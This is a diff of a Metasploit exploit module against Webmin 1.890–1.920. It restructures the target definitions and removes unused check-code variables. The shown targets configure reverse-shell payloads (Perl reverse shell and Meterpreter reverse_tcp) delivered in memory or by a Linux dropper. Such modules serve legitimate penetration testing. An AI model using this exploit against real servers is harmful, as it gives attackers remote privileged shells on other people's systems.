@@ -45,29 +45,31 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-08-10',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
           [
             'Automatic (Unix In-Memory)',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Version' => [
-              Rex::Version.new('1.890'), Rex::Version.new('1.920')
-            ],
-            'Type' => :unix_memory,
-            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Version' => [
+                Rex::Version.new('1.890'), Rex::Version.new('1.920')
+              ],
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
+            }
           ],
           [
             'Automatic (Linux Dropper)',
-            'Platform' => 'linux',
-            'Arch' => [ARCH_X86, ARCH_X64],
-            'Version' => [
-              Rex::Version.new('1.890'), Rex::Version.new('1.920')
-            ],
-            'Type' => :linux_dropper,
-            'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Version' => [
+                Rex::Version.new('1.890'), Rex::Version.new('1.920')
+              ],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
           ]
         ],
         'DefaultTarget' => 0,
@@ -112,7 +114,6 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(version)
 
     vprint_status("Webmin #{version} detected")
-    checkcode = CheckCode::Detected
 
     unless version.between?(*target['Version'])
       vprint_error("Webmin #{version} is not a supported target")
@@ -147,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # These CheckCodes are allowed to pass automatically
-    checkcodes = [
+    [
       CheckCode::Appears,
       CheckCode::Vulnerable
     ]
